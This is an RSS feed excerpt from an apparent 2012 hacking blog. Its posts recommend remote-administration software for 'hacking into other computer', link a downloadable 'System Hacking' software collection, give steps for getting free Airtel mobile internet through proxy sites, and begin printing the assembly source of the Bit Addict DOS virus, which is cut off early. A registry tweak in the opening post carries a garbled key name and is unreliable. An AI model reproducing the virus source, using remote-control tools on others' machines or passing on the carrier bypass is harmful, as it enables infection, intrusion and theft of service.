command.&lt;/div&gt;&lt;div style="line-height: 1.6em; margin-bottom: 0.75em;"&gt; 2) Type "regedit" inside the input space.&lt;/div&gt;&lt;div style="line-height: 1.6em; margin-bottom: 0.75em;"&gt; 3) Navigate to the registry key&lt;/div&gt;&lt;table border="1" cellpadding="2" cellspacing="0" style="width: 400px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td valign="top" width="400"&gt;&lt;strong&gt;HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\ContentIndex&lt;/strong&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="line-height: 20px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;img alt="image" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ_9Z3jamonzawGvAX5VGs0IVdxQlJdJnTGthRRRbOzgpa6cmJHbepADXa8CIcw_wV8dcPTlFCphRdKcbsj8Mvl7Ui99bDjdO-iksW0uPKPVYqkMifxCseCep1iHG1rZcamaOEl_5geJlc/?imgmax=800" style="line-height: normal;" /&gt;&lt;/div&gt;&lt;div class="post-body entry-content" style="background-color: white; color: #333333;"&gt; &lt;/div&gt;&lt;div class="post-body entry-content" style="background-color: white; color: #333333;"&gt; &lt;div style="line-height: 1.6em; margin-bottom: 0.75em;"&gt; 5) Select Decimal, and change the value to 40000&lt;/div&gt;&lt;div style="line-height: 1.6em; margin-bottom: 0.75em;"&gt; &lt;img alt="image" border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-2k7IQMjBbtH_H4KQIqm3HeXvxIVvzHJkwxe-SFul-_HoaWNdUewdl-QmzHT20ygK6kU7Fjz6xcr_v9ge5lDdn5Gm3DkhY60EJR8smP59mTz8r1hmTCz6zpIzHwoJiV1FqiJpge1-m1cR/?imgmax=800" style="border-width: 0px; display: inline; padding: 4px;" title="image" width="244" /&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/how-to-bootup-computer-in-10-seconds.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ_9Z3jamonzawGvAX5VGs0IVdxQlJdJnTGthRRRbOzgpa6cmJHbepADXa8CIcw_wV8dcPTlFCphRdKcbsj8Mvl7Ui99bDjdO-iksW0uPKPVYqkMifxCseCep1iHG1rZcamaOEl_5geJlc/s72-c?imgmax=800" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-7718459515615966646</guid><pubDate>Thu, 01 Mar 2012 14:26:00 +0000</pubDate><atom:updated>2012-03-01T06:26:25.526-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>Hacking Into Other Computer - Best Way</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiveJNkej6Ti4GtOEXNrclfZ_WSGsaCV5i30aLnsCu0O2vvKiMHGwO1SXoF2zYzHYbhg0Kai5XsM3Yn4Vp2LTMaLK988cR4Gy8SC8zxiujlLBNr22yvkFRiOv8_4ahYe7A24qd4zx06M3A/s1600/hacked-computer-june08.jpg" width="320" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div dir="ltr" style="color: black; text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="para" style="text-align: center;"&gt;&amp;nbsp; &lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt;&lt;b&gt;Hacking Into Other Computer -  Best Way&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div class="para" style="text-align: center;"&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div class="para" style="text-align: center;"&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt;&lt;b&gt;Radmin  Remote Administrator 3.2 - a Nice Hacking Software&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt;Remote  Administrator is the fastest remote control software. You see&lt;/span&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt; the remote computer screen displayed either in a window or full&lt;/span&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt; screen on your computer monitor. All mouse and keyboard functions are&lt;/span&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt; transferred to the remote computer. You can work with the remote&lt;/span&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt; computer as if you are sitting in front of it. According to our tests&lt;/span&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt; and our users feedback Remote Administrator outperforms all other&lt;/span&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt; remote controls in the speed of work.&lt;/span&gt;&lt;/div&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt; &lt;br /&gt;
&lt;b&gt;System Requirements :&lt;/b&gt;&lt;br /&gt;
Nothing special&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What's new :&lt;/b&gt;&lt;br /&gt;
Support  for Windows Vista SP1; Support for Windows Server 2008; Faster  speed  and smooth performance; Left-hand mouse support; Support for 27   languages. &lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt;&lt;b&gt;Download  Software :&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;div class="para"&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt;&lt;a href="http://rapidshare.com/files/141494291/Radmin__Remote.Administrator__3.2.rar" target="_blank"&gt;http://rapidshare.com/files/141494291/Ra&lt;wbr&gt;&lt;/wbr&gt;dmin__Remote.Administrator__3.2.rar&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt;&lt;b&gt;How to use :&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="para"&gt;&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt;Install&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt;Locate ip&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Century Gothic'; font-size: 10pt;"&gt;Enjoy.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/hacking-into-other-computer-best-way.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiveJNkej6Ti4GtOEXNrclfZ_WSGsaCV5i30aLnsCu0O2vvKiMHGwO1SXoF2zYzHYbhg0Kai5XsM3Yn4Vp2LTMaLK988cR4Gy8SC8zxiujlLBNr22yvkFRiOv8_4ahYe7A24qd4zx06M3A/s72-c/hacked-computer-june08.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-7870478575889273048</guid><pubDate>Thu, 01 Mar 2012 13:19:00 +0000</pubDate><atom:updated>2012-03-01T05:19:09.903-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>Hacking Software Collection</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG2B3urVE7h5HX-jTfH_Tcm5NBjyd-ye8efd8jT2LIwjQts-YsbwK0ft2qYW37nf7abWXjUumSn9CLFaypqMhyphenhyphenZ8GIAA69DQ3kLe8vl8rMIUh9fzDP7Sf1nO-SumsVH7uFf9xvQwxjypw/s320/hack.jpg" width="280" /&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;Contains all software needed for a hacker.&lt;span style="color: red;"&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="color: red;"&gt;Download Links:-&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://rapidshare.com/files/99867492/System_Hacking.part01.rar" style="color: blue;" target="_blank"&gt;http://rapidshare.com/files/99867492/Sy&lt;wbr&gt;&lt;/wbr&gt;stem_Hacking.part01.rar&lt;/a&gt;  &lt;br style="color: blue;" /&gt;&lt;a href="http://rapidshare.com/files/99870408/System_Hacking.part02.rar" style="color: blue;" target="_blank"&gt;http://rapidshare.com/files/99870408/Sy&lt;wbr&gt;&lt;/wbr&gt;stem_Hacking.part02.rar&lt;/a&gt;&lt;br style="color: blue;" /&gt;&lt;a href="http://rapidshare.com/files/99865070/System_Hacking.part03.rar" style="color: blue;" target="_blank"&gt;http://rapidshare.com/files/99865070/Sy&lt;wbr&gt;&lt;/wbr&gt;stem_Hacking.part03.rar&lt;/a&gt;&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/hacking-software-collection.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG2B3urVE7h5HX-jTfH_Tcm5NBjyd-ye8efd8jT2LIwjQts-YsbwK0ft2qYW37nf7abWXjUumSn9CLFaypqMhyphenhyphenZ8GIAA69DQ3kLe8vl8rMIUh9fzDP7Sf1nO-SumsVH7uFf9xvQwxjypw/s72-c/hack.jpg" width="72"/><thr:total>17</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-6429804411600295601</guid><pubDate>Thu, 01 Mar 2012 13:10:00 +0000</pubDate><atom:updated>2012-03-01T05:18:59.134-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking</category><category domain="http://www.blogger.com/atom/ns#">other</category><title>Airtel Free Internet</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBM7lUrATdBGrYv7cwThmaJYVXKOf5WYMYtvIpy5hI2p4hA94RgDyG3R1pSia6Rn140Lh0eLHPsFh6202gMKiW0Nix2lqtz_AgsSCKzSyOUG89JnTfKFH3p6U0dH3AqGYhxC4MrdxvtNE/s400/airtel-broadband-new-plans+copy.jpg" width="400" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: orange;"&gt;&lt;span style="color: black;"&gt;Airtel free internet surfing with resume  downloading ON PC  AND MOBILE WITH default browser and internet  browser,,,speed is super  fast than any other proxies...its capable to  hold cache so its cache  capable proxy with mind blowing speed FOR PC  and mobile: &lt;/span&gt;&lt;b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: black;"&gt;Trick Steps:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: black;"&gt;&lt;b&gt;1) Activate MOBILE  OFFICE ZERO RENTAL&amp;nbsp; Dial *567*11#&amp;nbsp; &lt;/b&gt;&lt;/div&gt;&lt;div style="color: black;"&gt;&lt;b&gt;2)  Keep BALANCE below .30 paisa&lt;/b&gt;&lt;/div&gt;&lt;div style="color: black;"&gt;&lt;b&gt;  3) Just connecct mobile with pc via pc suite.&lt;/b&gt;&lt;/div&gt;&lt;div style="color: orange;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;4) Put apn airtelgprs.com&lt;/span&gt;&lt;br style="color: black;" /&gt;&lt;span style="color: black;"&gt; 5) Now open any browser (i recomdd mozilla firefox or opera for resume  downloading) and put this&lt;/span&gt; &lt;span style="color: magenta;"&gt;address  122.170.122.214.proxytea.appspot.com/surfing site NAME without http.&lt;/span&gt;&lt;br style="color: orange;" /&gt;&lt;span style="color: orange;"&gt; &lt;span style="color: black;"&gt;note: After '/'  put your site name with out http' for example:&lt;/span&gt;&lt;/span&gt;&lt;br style="color: magenta;" /&gt;&lt;span style="color: magenta;"&gt;  122.170.122.214.proxytea.appspot.com/www.google.com&lt;/span&gt;&lt;br style="color: magenta;" /&gt;&lt;span style="color: magenta;"&gt;  122.170.122.214.proxytea.appspot.com/www.hackingtute.blogspot.com&lt;/span&gt;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: black;"&gt;&lt;b&gt;6) Now u can browse all free&lt;/b&gt;&lt;/div&gt;&lt;div style="color: orange;"&gt;&lt;b&gt;&lt;br style="color: black;" /&gt;&lt;span style="color: black;"&gt; there are many  appspot proxies working with our dis ip use any of the below:&lt;/span&gt;&lt;br style="color: magenta;" /&gt;&lt;span style="color: magenta;"&gt;  122.170.122.214.bypass-proxy.appspot.com/ur url without http&lt;/span&gt;&lt;br style="color: magenta;" /&gt;&lt;span style="color: magenta;"&gt;  122.170.122.214.bypass-filter.appspot.com/ur url without http&lt;/span&gt;&lt;br style="color: magenta;" /&gt;&lt;span style="color: magenta;"&gt;  122.170.122.214.cache-0035.appspot.com/ur url without http&lt;/span&gt;&lt;br style="color: magenta;" /&gt;&lt;span style="color: magenta;"&gt;  122.170.122.214.cache-049.appspot.com/ ur url without http&lt;/span&gt;&lt;br style="color: magenta;" /&gt;&lt;span style="color: magenta;"&gt;  122.170.122.214.cache-0046.appspot.com/ur url without http&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: black;"&gt;when u wil go to download page or tab just click the left button and  copy the download link and paste it into below site (but remember romove  the 122.170.122.214.proxytea.appspot.com/ from download link )&lt;/span&gt;&lt;br style="color: black;" /&gt;&lt;span style="color: black;"&gt; and paste the rest orignal url in the search box of the below site:&lt;/span&gt;&lt;br style="color: black;" /&gt;&lt;span style="color: black;"&gt; http://122.170.122.214.0000a-fast-proxy.de&lt;/span&gt;&lt;br style="color: black;" /&gt; &lt;br style="color: black;" /&gt;&lt;span style="color: black;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;span style="color: black;"&gt;(plz open it in new tab)&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: black;"&gt; so its nothing but to surf via google appspot proxy engine and resume   downloading via .de german proxy domain if u hv internet downd manager   then it gives high speed wid resume support.  &lt;/span&gt;&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/airtel-free-gprs.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBM7lUrATdBGrYv7cwThmaJYVXKOf5WYMYtvIpy5hI2p4hA94RgDyG3R1pSia6Rn140Lh0eLHPsFh6202gMKiW0Nix2lqtz_AgsSCKzSyOUG89JnTfKFH3p6U0dH3AqGYhxC4MrdxvtNE/s72-c/airtel-broadband-new-plans+copy.jpg" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-1799759707239978148</guid><pubDate>Thu, 01 Mar 2012 08:53:00 +0000</pubDate><atom:updated>2012-03-01T04:14:25.370-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">VB</category><category domain="http://www.blogger.com/atom/ns#">Virus</category><title>Bit Addict Versie 9</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG3co2d3HqB2eWvWmjgv9YrGURVhrUwaaCkQJi-uCI0yWiFwYFDpnZS4ui2Vv_gWL7uyWY8BH02Sju4ZRxjEb2bs7IiZcUgXwbcTUM29ywsjZdODEkDzrYo0mLbsl8XRIBvf6OXxzbmwM/s320/image+virus+2.jpg" width="320" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
; Bit Addict Versie 9&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
; de macro's hieronder worden gebruikt wanneer een conditionele sprong groter&lt;br /&gt;
; wordt dan 128 bytes en er dus een foutmelding komt&lt;br /&gt;
&lt;br /&gt;
dfn&amp;nbsp;&amp;nbsp;&amp;nbsp; macro&amp;nbsp;&amp;nbsp;&amp;nbsp; Num1,Num2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; db&amp;nbsp;&amp;nbsp;&amp;nbsp; Num1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; offset Num2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; endm&lt;br /&gt;
&lt;br /&gt;
jmpc&amp;nbsp;&amp;nbsp;&amp;nbsp; macro&amp;nbsp;&amp;nbsp;&amp;nbsp; Dest&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; vervanging voor jc&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; local&amp;nbsp;&amp;nbsp;&amp;nbsp; @@00&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jnc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@00&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; Dest&lt;br /&gt;
@@00:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; endm&lt;br /&gt;
&lt;br /&gt;
jmpnc&amp;nbsp;&amp;nbsp;&amp;nbsp; macro&amp;nbsp;&amp;nbsp;&amp;nbsp; Dest&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; vervanging voor jnc&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; local&amp;nbsp;&amp;nbsp;&amp;nbsp; @@00&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@00&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; Dest&lt;br /&gt;
@@00:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; endm&lt;br /&gt;
&lt;br /&gt;
jmpe&amp;nbsp;&amp;nbsp;&amp;nbsp; macro&amp;nbsp;&amp;nbsp;&amp;nbsp; Dest&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; vervanging voor je&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; local&amp;nbsp;&amp;nbsp;&amp;nbsp; @@00&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jnz&amp;nbsp;&amp;nbsp;&amp;nbsp; @@00&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; Dest&lt;br /&gt;
@@00:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; endm&lt;br /&gt;
&lt;br /&gt;
jmpne&amp;nbsp;&amp;nbsp;&amp;nbsp; macro&amp;nbsp;&amp;nbsp;&amp;nbsp; Dest&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; vervanging voor jne&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; local&amp;nbsp;&amp;nbsp;&amp;nbsp; @@00&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jz&amp;nbsp;&amp;nbsp;&amp;nbsp; @@00&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; Dest&lt;br /&gt;
@@00:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; endm&lt;br /&gt;
&lt;br /&gt;
eseg segment&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4c00h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; exit&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; int&amp;nbsp;&amp;nbsp;&amp;nbsp; 21h&lt;br /&gt;
eseg ends&lt;br /&gt;
&lt;br /&gt;
;-----------------------------------------------------------------------------&lt;br /&gt;
;-----&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -----&lt;br /&gt;
;-----&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Begin van het Bit Addict virus&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -----&lt;br /&gt;
;-----&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -----&lt;br /&gt;
;-----------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
cseg segment&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; assume&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:cseg,ds:cseg,es:cseg&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; org&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&lt;br /&gt;
&lt;br /&gt;
BeginCode&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; $&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; begin van het virus&lt;br /&gt;
&lt;br /&gt;
CodeSize&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; CodeEnd-BeginCode&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; de grootte van het&lt;br /&gt;
CodeSizePara&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; (CodeEnd-BeginCode+0fh) / 10h&amp;nbsp;&amp;nbsp;&amp;nbsp; ; virus achter een file&lt;br /&gt;
&lt;br /&gt;
VirusSize&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; VirusEnd-BeginCode&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; de grootte van het&lt;br /&gt;
VirusSizePara&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; (VirusEnd-BeginCode+0fh) / 10h&amp;nbsp;&amp;nbsp;&amp;nbsp; ; virus in het geheugen&lt;br /&gt;
&lt;br /&gt;
HeaderLength&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; 18h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; grootte van een&lt;br /&gt;
&lt;br /&gt;
SavedCode&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; this byte&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; gegevens over het&lt;br /&gt;
OldSignature&amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 5a4dh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; programma voor het&lt;br /&gt;
OldCSIP&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; this dword&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; virus&lt;br /&gt;
OldIP&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&lt;br /&gt;
OldCS&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&lt;br /&gt;
OldSP&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 200h&lt;br /&gt;
OldSS&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&lt;br /&gt;
OldPartPage&amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&lt;br /&gt;
OldPageCount&amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&lt;br /&gt;
&lt;br /&gt;
Begin:&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Programma om het virus&lt;br /&gt;
